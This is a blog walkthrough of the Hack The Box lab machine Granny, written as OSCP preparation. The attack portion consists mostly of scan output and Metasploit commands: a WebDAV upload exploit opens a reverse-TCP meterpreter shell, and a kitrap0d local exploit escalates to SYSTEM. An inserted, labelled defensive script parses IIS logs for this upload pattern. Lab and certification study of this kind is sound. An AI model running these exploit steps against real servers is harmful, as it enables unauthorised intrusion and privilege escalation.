Path to OSCP: Granny

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Granny up next. Nmap:

u01@nostromo:~$ nmap -p- -A granny.htb -oA HTB/granny/granny
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-16 08:55 IST
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Date: Sat, 16 Sep 2023 07:57:07 GMT
|_http-title: Under Construction
| http-methods: 
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.33 seconds

Just a single port to investigate, HTTP, which shows us a Windows IIS “Under Construction” page:

We run a standard gobuster scan while checking the IIS version for any known exploits in searchsploit:

u01@nostromo:~$ searchsploit iis 6.0
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------

WebDAV is potentially promising and might be worth digging into later. I run Nikto against the URL:

u01@nostromo:~/HTB/granny$ nikto -h granny.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: granny.htb
+ Target Port: 80
+ Start Time: 2023-09-16 11:10:11 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ /: Retrieved microsoftofficewebserver header: 5.0_Pub.
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /Nv0JC1rp.asmx: Retrieved x-aspnet-version header: 1.1.4322.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nikto-test-C0VT5oZn.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-C0VT5oZn.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK .
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH .
+ HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS: WebDAV enabled (PROPPATCH MKCOL UNLOCK COPY LOCK PROPFIND SEARCH listed as allowed).
+ /: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll. See: https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2003/aa142960(v%3Dexchg.65)
+ /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /postinfo.html: Microsoft FrontPage default file found. See: CWE-552
+ /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information). See: https://en.wikipedia.org/wiki/Microsoft_FrontPage
+ /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709
+ /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376
+ /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0114
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7965 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time: 2023-09-16 11:17:14 (GMT1) (423 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The most interesting result is “HTTP method ‘PUT’ allows clients to save files on the web server”. Meanwhile the gobuster scan has completed, revealing an empty /_private folder:

u01@nostromo:~$ gobuster dir -u http://granny.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://granny.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 148] [--> http://granny.htb/images/]
/Images (Status: 301) [Size: 148] [--> http://granny.htb/Images/]
/IMAGES (Status: 301) [Size: 148] [--> http://granny.htb/IMAGES/]
/_private (Status: 301) [Size: 152] [--> http://granny.htb/%5Fprivate/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

I kick off a scan of this folder for some common extensions while further investigating the allowed HTTP PUT method. I use davtest for a quick check, but have no luck simply uploading files to the directory root:

u01@nostromo:~$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: 7xvIJJVU
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT jhtml FAIL
PUT html FAIL
PUT jsp FAIL
PUT cfm FAIL
PUT php FAIL 
PUT shtml FAIL 
PUT asp FAIL 
PUT txt FAIL 
PUT aspx FAIL 
PUT pl FAIL 
PUT cgi FAIL 

********************************************************

I can’t tell at this stage whether this is due to a lack of authentication or some other issue. I also try the _private directory, but it is reported as not accessible or DAV not enabled, and cadaver returns a “500 Internal Server Error” for just about everything I try. Time to circle back to the searchsploit results, this time narrowing down to WebDAV:

u01@nostromo:~/HTB/granny$ searchsploit webdav iis
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow | windows/remote/1.c
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit) | windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030) | windows/dos/585.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1) | windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2) | windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3) | windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4) | windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) | windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service | windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service | windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service | windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote | windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) | windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
------------------------------------------------------------------------------------------------------------- ---------------------------------

I still think the exploits aimed directly at IIS 6.0 are the most promising, so I work down through them, but with no luck. The last one I try is a Python port of the Metasploit WebDAV Write Access Code Execution module, in an attempt to avoid using Metasploit for OSCP exam purposes:

(py2venv) u01@nostromo:~/HTB/granny$ python iis_webdav_upload.py granny.htb test.txt

Microsoft IIS WebDAV Write Code Execution exploit
(based on Metasploit HDM's <iis_webdav_upload_asp> implementation)
Mariusz B. / mgeeky, 2016

Step 0: Checking if file already exist: "http://granny.htb/file3H9749.asp;.txt"
[*] File does not exists. That's good.

Step 1: Upload file with improper name: "http://granny.htb/file3H9749.asp;.txt"
Sending 652 bytes, this will take a while. Hold tight Captain!
[!] Upload failed. Status: 404

Originally I was getting a 500 status from this exploit; after a reboot of the box it began returning a 404. At this point I’m fairly convinced there was a server issue earlier, which is confirmed by re-running davtest, which now succeeds:

u01@nostromo:/repo/PEASS-ng/winPEAS/winPEASps1$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: 9RFmdRv
********************************************************
Creating directory
MKCOL SUCCEED: Created http://granny.htb/DavTestDir_9RFmdRv
********************************************************
Sending test files
PUT cfm SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.cfm
PUT txt SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
PUT jsp SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jsp
PUT php SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.php
PUT pl SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.pl
PUT shtml FAIL
PUT cgi FAIL
PUT html SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
PUT asp FAIL
PUT aspx FAIL
PUT jhtml SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jhtml
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC txt SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC html SUCCEED: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
EXEC html FAIL
EXEC jhtml FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_9RFmdRv
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.cfm
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jsp
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.php
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.pl
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html
PUT File: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.jhtml
Executes: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.txt
Executes: http://granny.htb/DavTestDir_9RFmdRv/davtest_9RFmdRv.html


A little frustrated by this, I reach for Metasploit and get a shell literally within a few seconds!

msf6 exploit(windows/iis/iis_webdav_upload_asp) > options

Module options (exploit/windows/iis/iis_webdav_upload_asp):

Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The HTTP password to specify for authentication
HttpUsername no The HTTP username to specify for authentication
METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
PATH /metasploit%RAND%.asp yes The path to attempt to upload
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic




View the full module info with the info, or info -d command.

msf6 exploit(windows/iis/iis_webdav_upload_asp) > set rhosts granny.htb
rhosts => granny.htb
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set lhost tun0
lhost => 10.10.14.6
msf6 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Checking /metasploit122431681.asp
[*] Uploading 610301 bytes to /metasploit122431681.txt...
[*] Moving /metasploit122431681.txt to /metasploit122431681.asp...
[*] Executing /metasploit122431681.asp...
[*] Deleting /metasploit122431681.asp (this doesn't always work)...
[*] Sending stage (175686 bytes) to 10.10.10.15
[!] Deletion failed on /metasploit122431681.asp [403 Forbidden]
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.15:1030) at 2023-09-16 13:38:52 +0100

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > sysinfo
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2924 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

I’m getting some permission errors from meterpreter, so I drop down to a standard command shell and find we’re running as the Network Service account.
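From the defender's side, the sequence the Metasploit module logs above (PUT a .txt, MOVE it to .asp, GET the .asp, DELETE it) and the "file.asp;.txt" naming used by the Python port both leave a clear trail in IIS W3C logs. The following is an added example, not part of the original write-up; the log lines are constructed, and the field order is assumed to be the IIS 6 default.

```python
"""Flag the WebDAV upload-then-rename staging pattern in IIS W3C logs."""
import posixpath
import re
from collections import defaultdict

# Constructed sample log; the field order is assumed to be the IIS 6 default.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2023-09-16 12:38:40 10.10.10.15 GET /index.htm - 80 - 10.10.14.6 Mozilla/5.0 200 0 0
2023-09-16 12:38:51 10.10.10.15 PUT /metasploit122431681.txt - 80 - 10.10.14.6 Mozilla/5.0 201 0 0
2023-09-16 12:38:52 10.10.10.15 MOVE /metasploit122431681.txt - 80 - 10.10.14.6 Mozilla/5.0 201 0 0
2023-09-16 12:38:52 10.10.10.15 GET /metasploit122431681.asp - 80 - 10.10.14.6 Mozilla/5.0 200 0 0
2023-09-16 12:38:53 10.10.10.15 DELETE /metasploit122431681.asp - 80 - 10.10.14.6 Mozilla/5.0 403 0 0
2023-09-16 12:40:00 10.10.10.15 PUT /file3H9749.asp;.txt - 80 - 10.10.14.6 python-requests/2.31 404 0 0
2023-09-16 12:41:00 10.10.10.15 PUT /DavTestDir_9RFmdRv/davtest_9RFmdRv.txt - 80 - 10.10.14.6 DAV.pm/v0.49 201 0 0
"""

WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}
SCRIPT_EXT = {".asp", ".aspx"}                 # extensions IIS 6 hands to a script engine
SEMICOLON_TRICK = re.compile(r"\.aspx?;", re.IGNORECASE)   # names like file.asp;.txt


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            cols = line.split()
            if len(cols) == len(fields):        # drop malformed rows instead of guessing
                yield dict(zip(fields, cols))


def detect(rows):
    """Return (severity, rule, client, uri, timestamp) findings, in log order."""
    findings = []
    staged = defaultdict(set)   # (client, path minus extension) -> write methods seen
    for row in rows:
        method, uri, client = row["cs-method"].upper(), row["cs-uri-stem"], row["c-ip"]
        status, when = int(row["sc-status"]), f"{row['date']} {row['time']}"
        base, ext = posixpath.splitext(uri.lower())
        if SEMICOLON_TRICK.search(uri):
            findings.append(("high", "semicolon-extension-trick", client, uri, when))
        if method in WRITE_METHODS:
            ok = 200 <= status < 300
            findings.append(("medium" if ok else "low",
                             f"webdav-{method.lower()}-{'ok' if ok else 'denied'}",
                             client, uri, when))
            if ok and method in {"PUT", "MOVE", "COPY"}:
                staged[(client, base)].add(method)
        elif method == "GET" and ext in SCRIPT_EXT and status == 200:
            seen = staged.get((client, base), set())
            # A file was written under one extension, renamed, then fetched as a script.
            if "PUT" in seen and seen & {"MOVE", "COPY"}:
                findings.append(("critical", "staged-script-executed", client, uri, when))
    return findings


if __name__ == "__main__":
    for sev, rule, client, uri, when in detect(parse_w3c(SAMPLE_LOG)):
        print(f"{when} {sev:8} {rule:26} {client} {uri}")
```

Even the failed 404 and 403 attempts are reported, since a write-method request against a public site is worth a look regardless of outcome.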

I do some manual enumeration of the accessible directories, but nothing stands out; this account has very limited file system access. I attempt to upload winPEAS.ps1 to C:\inetpub\, but get an error. Since I’ve already popped the Metasploit cherry on this box, I use multi/recon/local_exploit_suggester to find a suitable privilege escalation path.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 186 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.15 - Valid modules for session 1:
============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. 
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated. 
6 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.

After attempting a number of these, I consistently get the error “exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.” After a quick Google, it looks like I need to migrate into a process owned by Network Service:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
200 1064 cidaemon.exe
272 4 smss.exe
288 1064 cidaemon.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
580 392 svchost.exe
668 392 svchost.exe
720 2204 svchost.exe x86 0 C:\WINDOWS\Temp\rad689F6.tmp\svchost.exe
736 392 svchost.exe
768 392 svchost.exe
788 392 svchost.exe
924 392 spoolsv.exe
952 392 msdtc.exe
1064 392 cisvc.exe
1112 392 svchost.exe
1168 392 inetinfo.exe
1204 392 svchost.exe
1312 392 VGAuthService.exe
1384 392 vmtoolsd.exe
1488 392 svchost.exe
1600 392 svchost.exe
1764 392 dllhost.exe
1944 392 alg.exe
1960 580 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2228 344 logon.scr
2512 580 wmiprvse.exe
2924 720 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
4064 1064 cidaemon.exe

meterpreter > migrate 1960
[*] Migrating from 720 to 1960...
[*] Migration completed successfully.

We background the meterpreter session and try the suggested exploits again, getting a hit with ms10_015_kitrap0d to gain SYSTEM and obtain the flags:

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 3444 launched.
[*] Reflectively injecting the DLL into 3444...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.15:1033) at 2023-09-16 14:25:33 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > dir "C:\\Documents and Settings\\Administrator\\Desktop\\"
Listing: C:\Documents and Settings\Administrator\Desktop\
=========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-12 20:17:07 +0100 root.txt

Takeaway for OSCP

This was a frustrating box due to the server issues. I seemed to be on the right path for using PUT to upload a reverse shell as initial foothold and would likely have completed it without Metasploit if there hadn’t been any issues. I know this is part and parcel of exploitation, but frustrating nonetheless. I guess the takeaway here is to trust your gut instinct if you think the server is acting strangely and not to be afraid to reboot multiple times.
